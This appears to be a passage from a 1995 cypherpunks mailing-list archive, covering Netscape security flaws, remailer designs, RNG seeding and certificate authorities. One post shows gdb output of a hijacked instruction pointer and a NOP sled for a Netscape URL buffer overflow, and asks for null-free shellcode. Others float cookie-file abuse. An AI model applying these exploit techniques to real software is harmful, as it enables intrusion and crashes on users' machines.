machine application for its patented Iriscan process.  
	 According to experts, the eye is one of the most unique 
parts of the human body and the iris biometric more reliable 
than virtually any other, including fingerprints and voice.  
	 Voices change over the course of a life, and fingerprints 
sometimes disappear on people who work with their hands.  
	 By contrast, the iris, which is the colored area of the eye, 
is stable throughout a lifetime. They are thoroughly unique and 
naturally visible.  
	 In a nutshell, the company's product, to be sold under the 
name Irisident, is being designed to capture an image of a 
consumer's eye and match it to an image on file before 
authorizing an ATM transaction.  
	 ``The research that's been done with consumers indicates 
they like the idea of having biometric verification -- it gives 
them a feeling of greater security,'' said Liam Carmody, a 
principal with the Ridgewood, N.J.-based consulting firm Carmody 
& Bloom. ``But they don't want intrusive verification.''  
	 Sensar officials understand that the use of the eye as an 
identification tool is likely to meet with skepticism from some 
bankers, who wonder whether consumers will rebel against it.  
	 However, they said their ATM application -- which should be 
available in prototype in the next few months -- is being 
designed to address the consumer concerns. And they insist that 
Irisident products will be of practical use to bankers.  
	 ``We are operating under the assumption that the consumer is 
not going to put his eye up to something to be scanned,'' said 
Kevin McQuade, vice president of strategic business development 
at Sensar.  
	 ``The breakthrough here is the ability to obtain the image 
of the eye unintrusively,'' said Thomas Drury, president and 
chief executive of Sensar, which is a unit of the David Sarnoff 
Research Center Inc., also based in Princeton.  
	 Several influential companies have committed money to the 
development of an ATM application for Sensar's technology, 
including Huntington Bancshares Inc., OKI Electric Industry 
Ltd., and a money-center bank that does not want to be 
identified.  
	 Though the bankers declined to discuss their investment in 
the project, OKI Electric has committed a minimum of $25.8 
million for development funding in return for the exclusive 
rights to market the products in Japan, where the Tokyo-based 
company is the leading vendor of ATMs.  
	 Experts said this support shows that the financial services 
industry is looking for alternatives to the personal 
identification numbers and computer passwords that have been 
compromised with increasing frequency in recent years.  
	 The choices are many, and include fingerprints, on-line 
signature verification, and even the measurement of facial 
thermal zones.  
	 ``Bankers are interested in alternatives to the PIN,'' said 
V. John Stroia, a marketing manager with Diebold, Canton, Ohio. 
Diebold and IBM operate an ATM joint venture known as InterBold.  
	 ``The major barrier is not so much the technology as getting 
the customer acclimated to'' using biometric technologies. But, 
he added, capturing sensitive biometric data -- such as that 
from the eye or face -- ``is going to have to be covertly 
done.''  
  	   	

----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 26 Sep 95 15:22:07 PDT
To: cypherpunks@toad.com
Subject: Re: WSJ on Netscape Hole 3
In-Reply-To: <Pine.SUN.3.91.950925182134.14756E-100000@thrash.src.umd.edu>
Message-ID: <449ucq$f5d@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509252300.QAA29812@infinity.c2.org>, sameer@c2.org (sameer) writes:
> 	He's -asking- for an exploit. Tshirts to Ray and the person who
> does the exploit, if it gets written. Maybe I should just ring up 8lgm and
> have them do one.
> 
> 
> > 
> > On Mon, 25 Sep 1995, John Young wrote:
> > 
> > >    The Wall Street Journal, September 25, 1995, p. B12.
> > 
> > >    Marc Andreessen, vice president of technology at Netscape,
> > >    said the company will issue fixes for the recent glitches
> > >    later this week. He added that it's unclear whether
> > >    anything other than temporarily crashing a user's computer
> > >    could result trom the recent flaw. 
> > 
> > Oh Marc, you didn't really want to say that, did you?
> > 
> > -Thomas
> > 

  I asked Marc about this one, since it bothered me too.  Apparently
Jared asked Marc if he was aware of specific examples of how this bug
might be exploited.  Marc replied that we had not seen anything
other than what was already posted on cypherpunks.

  Since the original article did not use quotes, I assume that what
was written was a paraphrase, and as such it has been interpreted
by the author.

  That said, we take this problem seriously, and have
taken steps to fix it.  The patch that will be released tomorrow
will include fixes for this buffer overflow, and others that we
found during a review of all of our code.  I think it would be
more constructive to pound on the new version than one that is
known to be busted, and will be patched by tomorrow.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 26 Sep 95 22:32:35 PDT
To: cypherpunks@toad.com
Subject: Re: chaos cryptography
Message-ID: <ac8e3166000210040c79@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



>Hi all - saw this in New Scientist and thought you might be interested
>(I guess it's more stenography than cryptography):
                    ^^^^^^^^^^^

Yes, chaotic communication is preferred by secretaries around the world.

They follow their dictates.


--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <inglem@adnetsol.com>
Date: Tue, 26 Sep 95 22:53:38 PDT
To: digitaliberty@phantom.com
Subject: Coercion-proof remailers (solved?)
Message-ID: <199509270552.WAA00475@cryptical.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


For a while I've been talking about the importance of a robust
infrastructure for anonymity, including coercion-resistant remailers.
Here is an approach that appears to eliminate the problem of
after-the-fact coercion.

Existing remailers chain messages by using a fixed public/secret key
pair in each remailer. This leaves them open to after-the-fact
compromise from the sender end. If you capture a message as the sender
sends it, you can later get the key of the first remailer, and decrypt
the first layer. You can then proceed on down the line to the
recipient. This creates a motive for an attacker to coerce remailers,
and it means the value of the remailers' keys continually increase as
more messages are sent.

Instead of using a fixed key, the sender can perform a Diffie-Hellman
exchange with the recipient at each point in a message's passage. This
eliminates the coercion problem, since there is no permanent key to
steal, but allows a corrupt remailer to see where the message is going.
If the first remailer is corrupt, the whole path is compromised.

The next step is to make sure there is no first remailer.

The sender S generates a message and header requesting mailing     S
to the recipient R. The sender splits it into two pieces using    / \
a method that requires both pieces to recover any data. Then he  1   2
adds a header to each piece requesting remailing to remailer 3.   \ /
He sends one piece to remailer 1 and one piece to remailer 2.      3
The transmissions are protected by DH exchange and encryption.     |
Remailers 1 and 2 each send their pieces to remailer 3. These      R
transmissions are also protected by DH exchanges. Remailer 3
combines the two pieces, recovers the header requesting remailing
to R, and sends the recovered message to R.

This approach is secure against after-the-fact coercion or key theft,
because there is no persistent key to recover. It is also secure
against any one of the three remailers being corrupt. If 3 is corrupt,
it sees both pieces as it combines them, and knows they came from 1 and
2, but does not know where 1 and 2 got them from. If 1 is corrupt, it
knows that a message from S went to 3, but it has only half of the
split message, so it can't find out where 3 sent it to. If any two of
the three are corrupt, the path is exposed.

It is possible to add more levels. This one uses seven remailers,  /S\
and can survive any two being corrupt. Some questions I don't    / | | \
know the answers to: What is the best possible arrangement of   1  2 3  4
remailers, so that the highest percentage of them have to be     \ / \ /
corrupt before the path is revealed? If any continuous line       5   6
from S to R is corrupt, the path is revealed. And if any two       \ /
remailers in a 'triangle' are corrupt, the whole triangle is        7
corrupt. For example, 1 and 2, 1 and 5, or 2 and 5.                 |
Is there a better arrangement, reusing some remailers, that         R
allows the message to remain secure with a higher number of corrupt
remailers in the path?

							Mike

  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 26 Sep 95 23:16:32 PDT
To: Jonathan Blake <cypherpunks@toad.com
Subject: Re: Fax encryption software
Message-ID: <199509270616.XAA16763@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:34 PM 9/26/95 -0700, Jonathan Blake wrote:
>
>	I saw this article in alt.privacy.
>
>	Anybody think the described encryption actually is worth 
>	looking at.
>
> We are talking about a 72 bit engine that is more than 
> sufficiently strong for time sensitive general business purposes. 

Since David does not know the difference between CPU word
width and an encryption algorithm, I think it is safe to 
ignore him.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 26 Sep 95 06:37:42 PDT
To: craig@passport.ca (Craig Hubley)
Subject: Re: cypherpunks press releases/contact list: YES!! DO IT!!
In-Reply-To: <m0sxU3V-001BjIC@passport.ca>
Message-ID: <199509261336.XAA20707@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello craig@passport.ca (Craig Hubley)
  and perry@piermont.com
  and cypherpunks@toad.com

craig@passport.ca (Craig Hubley) writes:
...
> > we've gone over this many times. We aren't a group. We're a mailing
> > list. We've got a diversity of opinions, and we have no organization
...
> True enough, but there are sometimes rough consenses on technical questions,
...
Consenses or consensuses or consenci? Maybe consensen? Consensix?

> "Consensus on cypherpunks seems to be that 40 bit encryption is not viable
>  for commercial applications, and that Netscape seems to have taken less
>  than due care to choose an appropriate random seed for its session keys."

Careful there, that comma is rather small to be between two completely
unrelated statements. You might want a semicolon, full stop or
better yet a paragraph break.

If you want another to make a round number, how about something
about GAK and a-screwed keys? I think there's a consensus on
that one... (definitely stronger than on the Netscape point, anyway)


Good luck, anyway!

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGgB5SxV6mvvBgf5AQHvuAQAihd2DyYnbhwQL2lHcs0qhnmS7U5pguGu
YLCPszybtprsOJ818K5RpFcBFkg+n8TALMONovyt/IDQjo3LLWvx/XO+MrbeLdLU
EpgOo1O73z2/GpcCmmGaamzt9+0+lXc05Xnepl3iwihgQtWgG+XUyLcASKk28/SJ
JvwzwIbttc4=
=L7Vi
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 26 Sep 95 20:38:18 PDT
To: cypherpunks@toad.com
Subject: Status of Netscape Bug Exploit (suggestions needed)
Message-ID: <199509270338.XAA09600@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



Ok Folks, here's what I got so far...


1) a URL that can place a specific value in the program counter

(gdb) select-frame 2
(gdb) info frame
Stack level 2, frame at 0xefbfbc30:
 eip = 0xefbfbc30; saved eip 0x90909090
 ^^^^^^^^^^^^^^^^
 called by frame at 0x90909090, caller of frame at 0xefbfbc14
 Arglist at 0xefbfbc30, args: 
 Locals at 0xefbfbc30, Previous frame's sp is 0xefbfbc1c
 Saved registers:
  eax at 0xefbfbc2c, ecx at 0xefbfbc28, edx at 0xefbfbc24, ebx at 0xefbfbc20,
  ebp at 0xefbfbc18, esi at 0xefbfbc14, edi at 0xefbfbc10, eip at 0xefbfbc0c,
  ps at 0xefbfbc08
 
2) A piece of exploit code on the stack near the PC

(gdb) disassemble 0xefbfbc10 0xefbfbc40
0xefbfbc27:     nop    
0xefbfbc28:     nop    
0xefbfbc29:     nop    
0xefbfbc2a:     nop
0xefbfbc2b:     nop    
0xefbfbc2c:     nop    
0xefbfbc2d:     nop    
0xefbfbc2e:     nop    
0xefbfbc2f:     nop    
0xefbfbc30:     nop    
0xefbfbc31:     nop    
0xefbfbc32:     nop    
0xefbfbc33:     nop    
0xefbfbc34:     nop    
0xefbfbc35:     nop    
0xefbfbc36:     nop    
0xefbfbc37:     nop    
0xefbfbc38:     nop    
0xefbfbc39:     nop    
0xefbfbc3a:     nop    
0xefbfbc3b:     nop    
0xefbfbc3c:     nop    
0xefbfbc3d:     nop    
0xefbfbc3e:     nop    
0xefbfbc3f:     nop    
0xefbfbc40:     nop    
 
3) exploit code that calls the kernel syscall() with SYS_exit
  (benign exploit, causes your browser to exit)

The problem? To make a syscall under BSDI2.0, I have to execute
an lcall 0x7,0x0 with 1,0 on the stack. However, to exploit the netscape
bug, you can not embed 0x0 in the URL. No problem I thought, I searched
Netscape's executable for any kernel calls, and found an lcall 0x7,0x0
at 0x257fee. But I can't do a 32-bit direct jump without a zero,
in the instruction (the 32-bit address is 0x00257fee), and I can't
do a relative jump from 0xefbfbc30+ 

If you can come up with some 386 assembly under BSDI2.0 which can
invoke syscall() in the kernel without any embeded 0x0 bytes
in the code, you can share a Hack Netscape T-Shirt with me.

If it turns out to be too hard under BSDI, I'll gladly assist
in producing exploits for Windows or another operating system.

One trick I thought up for embeding zeros in the code is to self-modify
the code using XOR ADDRESS,ADDRESS where ADDRESS is a byte on the stack
within the code.

Anyone have any better ones?

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 26 Sep 95 17:28:10 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape for OS/2, when? (Re: Another Netscape Bug)
In-Reply-To: <199509261223.JAA01800@bud.peinet.pe.ca>
Message-ID: <44a4kt$jda@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509261223.JAA01800@bud.peinet.pe.ca>, sentiono@cycor.ca (Sentiono Leowinata) writes:
> On Tue, 26 Sep 1995 05:58:19 -0400 (EDT) you wrote:
> 
> >> It's not an exploit script, but you can find an auto crash "animation"
> >> for Ray's discovered bug on 
> >>   http://hplyot.obspm.fr/~dl/netscapesec/c1.html
> >> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/)
> >Crashes the 16-bit Windows version 1.1N.
> >DCF
> 
> Same here. For more information (not Netscape related), Web Explorer
> 1.02 for OS/2 also crashes for the long URL.
> I wish Netscape will port it to OS/2 (already ask them, but no comment
> from Netscape). I don't try it on Netscape 1.1N as it doesn't run
> reliably under Win-OS/2 (10 min -> crash! ;)

  My understanding is that OS/2 is supposed to be windows compatible,
as in "better Windows than Windows".  If our windows app doesn't run
on OS/2, then isn't it IBM's bug, not ours?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Tue, 26 Sep 95 21:09:20 PDT
To: cypherpunks@toad.com
Subject: PGP and FBI?
Message-ID: <199509270409.AAA00688@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



There's some sort of documentary on WBAI 99.5 FM out of NYC now.
They're talking about PGP and right wing militias... the guy being
interviewed called PGP a "one time pad system" and doesn't understand
it... *sigh*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Tue, 26 Sep 95 23:22:02 PDT
To: gorkab@sanchez.com (Brian Gorka)
Subject: Re: Windows MixMaster Client
In-Reply-To: <00996F95DAD78CE0.0000381E@sanchez.com>
Message-ID: <199509270632.AAA01325@zeezrom.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Does anyone out there have a windows mixmaster client?  (or a pointer to one?)

There are none.

> Also, I am having a LOT of grief trying to get the alpha.c2.org  remailer to
> work for me... (yes, I have the help files)

> Could someone walk me through it? 

You mean the nym server at alpha.c2.org? It seems to have about a 1 week
delay on it...
 
Be sure the reply block that you give it is your own, and that you tell
alpha which remailer the reply block goes to.

Don



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 27 Sep 95 00:36:08 PDT
To: cypherpunks@toad.com
Subject: Hack Microsoft At Work Fax?
Message-ID: <199509270735.AAA23328@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been helping a client install Microsoft Windows for Workgroups,
which comes with Microsoft At Work Fax.  The fax software, in addition
to doing normal stuff, lets you encrypt faxes with passwords or public-key
encryption for sending to other people who use the same software.
The manual has minimal technical information, so I don't know the algorithms
it uses; it mostly talks about what GUI buttons to push.  

I was hoping the section on taking your software overseas would say
something about
Export Laws and International Arms Traffickin' (and creatin' a disturbance...)
but all it said was how to set the international-direct-dialing phone codes
so you can get your fax to go where you want.  Because of that, I'm guessing 
it's something like RC4/40 and RSA-512 with some sort of user name as part of 
the public key field, but I'd like to know more, and I'm also guessing that 
they've got some sort of general export license permission from the Feds.

The public-key system uses a public key file with "154 computer-generated 
characters", and recommends exchanging public keys by floppy disk.  
I don't know if that's 154*8 bits, or 154*6 or *4, or if there's a user-name
string using up some of those characters; probably the latter since it's
probably 512 bits because of export.

I called the usually helpful Microsoft Technical Support phone number,
and they were friendly and will try to get back to me, but this is
way out of the scope of the kind of questions they're used to :-)
And the stuff I could find from the Web page or ftp.microsoft.com
on encryption had less than the manual, plus some stuff on password
encryption, plus some stuff on their RAS remote network access stuff
which apparently uses DES as well as standard PPP handshaking or
Shiva handshaking.

Does anybody have any more information?  It'd be fun to hit up Microsoft
for the next crack if it's weak enough; the fax stuff can also be sent by MSMail
so there is eavesdropping potential.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Wed, 27 Sep 95 00:45:16 PDT
To: Frank A Stevenson <frank@funcom.no>
Subject: Re: netscape NSRANDFILE compatible with /dev/random ?
In-Reply-To: <Pine.SGI.3.91.950927082835.1586B-100000@odin>
Message-ID: <9509270040.ZM150@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 27,  8:32am, Frank A Stevenson wrote:
> Subject: netscape NSRANDFILE compatible with /dev/random ?
> 
> What happens if NSRANDFILE is set to /dev/random ?
> will netscape try to read an infinite number of random bytes ?

  In the current patch it will read up to 1 megabyte before stopping.
In 2.0 I will add a way to specify a size.  As a temporary hack you
could use 'dd' to get the number of bytes you want into a file, then
remove the file once netscape had started up.

	--Jeff



-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 26 Sep 95 17:50:03 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape RNG
In-Reply-To: <199509250649.CAA27099@clark.net>
Message-ID: <44a728$jda@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.LNX.3.91.950926072411.866D-100000@russell.moore.com>, drc@russell.moore.com (David R. Conrad) writes:
> I also noticed that they use $HOME/.pgp/randseed.bin under unix, but
> they don't bother with %PGPPATH%\RANDSEED.BIN on PCs.  I've sent Jeff
> a private message about this.

  As noted in a previous message, I've replaced the hardcoded randseed.bin
with an environment variable that names a file to pass through the seed
hash.  This is only on the unix version for now, but I plan to put it
into the PC version for 2.0.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 26 Sep 95 18:01:01 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit
In-Reply-To: <199509251741.KAA04656@infinity.c2.org>
Message-ID: <44a7mr$jda@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509251741.KAA04656@infinity.c2.org>, sameer@c2.org (sameer) writes:
> 	The really big sticking point I see, however, is the
> certification authorities. There is a single point of failure here and
> that is at Verisign. This becomes a large problem I think if the en
> rypted email that Netscape does requires personal x509 certificates (I
> read that Versign is issuing those for $9/each.) This is a problem
> because for one thing I don't think Versign will want to issue certs
> to psudonyms, and Netscape may not talk encrypted email to
> non-certified people. (I am not sure)

  I believe that the identies of free certificates that verisign plans
to offer to netscape customers will not be checked in any way other than
to ensure that the name is unique for that CA.  You will have to ask
someone from Verisign to get a certain answer.

> 	The solution to this, of course, is to allow Navigator to
> accept alternate certification hierarchies, so we can setup a
> Cypherpunks cert agency or a c2.org cert agency, which -will- sign
> nym's keys, etc. The question exists though, as to whether or not
> Netscape will allow for alternate agencies in Navigator.

  I have stated here, and in other public forums, several times in the
past few months, that Netscape Navigator 2.0 will support user configurable
certificate authorities.  You will be able to specify that you do or
do not trust specific server certificates and certificate authorities.
The user will be able to incorporate new CA certificates into their
certificate database, and mark them as trusted for signing certs for
SSL, email, etc.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 27 Sep 95 01:49:30 PDT
To: cypherpunks@toad.com
Subject: testab
Message-ID: <199509270848.BAA14286@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


testab







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 27 Sep 95 01:50:57 PDT
To: cypherpunks@toad.com
Subject: testab
Message-ID: <199509270849.BAA14441@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


testab







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Sep 95 22:54:18 PDT
To: "James Caldwell" <jcaldwel@iquest.net>
Subject: Re: Yet Another Alarmist TV Show About Child Molesters on the Ne
In-Reply-To: <m0sxorl-00032TC@dorite1.iquest.net>
Message-ID: <199509270554.BAA17087@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Thats the weirdest statement about the dialectic I've ever heard -- it
bears no resemblance to what the man was talking about
whatsoever. Hegel was discussing a theory of how historical changes
occur, not suggesting a way to achieve change. You also have his dates
wrong -- 200 years too early. The comment also had nothing whatsoever
to do with the topic of this mailing list.

.pm

"James Caldwell" writes:
> On 25 Sep 95 at 0:06, Hroller Anonymous Remailer wrote:
> 
> It's called the Hegelian Diclectic(sp?) first postulated by William
> Hegel (an ass) in Germany approx the 1600's as a method for social change
> when none could otherwise be achieved.
> 
> > And the trashing will continue.  It is the classic scenario.
> > Feed the media negative press clips about the entity you wish
> > to discredit (here, the Net), e.g.:
> > 1.  All those pedophiles out to lure your children;
> > 2.  Big coverage on catching some of those pedophiles;
> > 3.  First page coverage on breaking Netscape's code with the
> >     headlines that your sensitive information such as your
> >     credit card numbers, etc. can be retrieved (ignoring that
> >     the reason was to show Netscape's poorly structered code
> >     would allow this and, therefore, preventing it before it
> >     could happen);
> > 4.  Expect cryptology to crop up in the Oklahoma bombing trial.
> >     There already has been articles of those involved having
> >     allegedly used that *damned* Net to correspond.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 26 Sep 95 23:19:34 PDT
To: cypherpunks@toad.com
Subject: Wild Idea for RNG
Message-ID: <199509270619.CAA11744@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




Ok, so I'm reading a message somewhere and I see a message about
algorithmic information theory. Cryptography was recently on my
mind and I thought of Chaitin's quote "arithmetic is random"

So, why not construct a turing machine with a large state transition
table, input a random program, and get a 1 or 0 bit depending on
whether it halts in X number of cycles. You could even get more
than 1 bit out of it by measuring how many cycles it takes to halt
(if it halts before X) and use the LSB. Is it as secure as
the halting problem? (intractable to devise an algorithm used
to predict a bit with more than 50% confidence if you knew the
state table?) 

Ok, so it's impractical.


So how about this:

Grab a picture of the current bitmap on your screen. Run it through
a good compression algorithm (say, an arithmetic/Q-coder or
one of the LZ schemes). Grab the LSB of every 4th byte or so.
If the screen is size 1024*768*8, that's 786432 bytes. Let's assume
a 10 to 1 compression ratio = 78643 bytes. Let's assume you take
1 bit from every 10 byte, that's 983 bits of entropy.

The screen will often contain data like:

random placement of icons and windows
current time
current applications running, and the data in their windows


If Netscape was running for instance, part of the random bits
would come from the bitmap representation of the data in Netscape's
window which would depend on the URL being displayed.


 
-Ray


 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 26 Sep 95 23:26:40 PDT
To: inglem@adnetsol.com (Mike Ingle)
Subject: Re: Coercion-proof remailers (solved?)
In-Reply-To: <199509270552.WAA00475@cryptical.adnetsol.com>
Message-ID: <199509270626.CAA13654@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




  This idea is similar to an approach I posted a month or so ago
entitled "anonymous name resolution" which uses shamir sharing
to break up the recipient's address so that there is no first remailer
to coerce.

  The idea is that you should not deliver to e-mail addresses on
the remailer network, but to "handles", these handles will be
distributed across a DNS-like system that splits up the handles
using shamir sharing. No server stores the handle->email mapping,
but the whole network can perform the mapping. Remailers don't deliver
the message to the final destination, but deliver pieces of the
message to the anonymous name resolver network which perform the
final delivery.

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Wed, 27 Sep 95 00:50:58 PDT
To: sameer <sameer@c2.org>
Subject: Re: getting netscape to support the remailers
In-Reply-To: <199509261957.MAA20143@infinity.c2.org>
Message-ID: <Pine.SUN.3.90.950927024402.1929A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


As far I can tell from netscapes web pages and the java mailing lists 
there only way to add to the runtime is with DLL's. Jave is only being 
used for applets. And whatever they may say their scripting language is 
not Java. (An engineer at Sun that worked on getting Java to work for 
Netscape said that Sun had nothing to do with that half cooked scripting 
language).

I for once can wait till HotJava is more stable. You can modify it at 
your hearths content. And learning Java is easy enough.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 26 Sep 1995, sameer wrote:

> 	That was what I was thinking as well. I am confused by
> Netscape's java support though.. I haven't seen very many details. Is
> netscape going to only support applets or can you add stuff to the
> runtime as well? In order to use jcrypt one needs access to add stuff
> to the runtime I beleive.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Wed, 27 Sep 95 00:12:22 PDT
To: eb@comsec.com (Eric Blossom)
Subject: Re: Cypherpunks Lite
In-Reply-To: <199509262133.OAA21492@comsec.com>
Message-ID: <199509270704.DAA10591@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Eric Blossom writes:

> I provide a moderated version of the Cypherpunks list called
> "Cypherpunks Lite".[...]

I offer a similar service, with the following provisos:

 o There's no fee (unless you want to donate ecash)
 o No digest format available
 o Approximately the same statistics as Cpunks Lite (5-10% of
   all incoming messages, depending on content)
 o No archives of previous mailings available for public review
   to aid in consumer choice

I call it "Cpunks Frog Forwards". To be added or removed, send
a polite request to the human behind this address.

-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
                 To be a skeptic is to refuse to be a victim.
       "This is my .sig. There are many like it, but this one is mine."
                            Freedom...yeah, right.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Wed, 27 Sep 95 01:21:32 PDT
To: Alan Olsen <alano@teleport.com>
Subject: Re: [NOISE] Re: Easter Eggs
In-Reply-To: <199509261959.MAA28501@desiree.teleport.com>
Message-ID: <Pine.SUN.3.90.950927031557.2286A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Actually there is a limit of 20 cokies per web server.
I will have to check to see if there is a limit on the size of
the cookie. And no you dont need a Netscape server. Its just another
HTTP header. What about this: downloading a encoded picture
contating graphic description of sex with minors. Would the FBI go around 
checking peoples cookie files and busting them?

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 26 Sep 1995, Alan Olsen wrote:

> obNetscapeHack:  There is a feature called a "cookie file" in Netscape that
> is ripe for exploitation as a security leak.  If you are using a Netscape
> server (and you may not even need that), you can feed all sorts of
> information into it without the user's knowlege.  I have heard of one page
> that overloads the cookie file until the machine runs out of drive space.  I
> am sure that there are other exploitable holes there...  Any takers?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Thu, 28 Sep 95 13:35:32 PDT
To: cypherpunks@toad.com
Subject: Re: STT_???
Message-ID: <m0syPfu-00035EC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


On 28 Sep 95 at 8:08, John Young wrote:

>    9-28-95. W$Japer:
> 
> 
>    "Infighting Unravels Alliance Seeking Standard to Protect
>    Internet Purchases."

Money, money, money, MONEY!
 
Let's hope Digital cash sans the Corprats takes...
>       The consortium brought together such top players as
>       credit-card rivals Visa International and MasterCard
>       International Inc., software titan Microsoft Corp. and
>       Internet upstart Netscape Communications Corp. But this
>       week, the alliance split because of tensions between
>       Visa and MasterCard and their respective technology
>       partners -- Microsoft and Netscape.

Watch the vultures at Mirosoft come to feed:
 
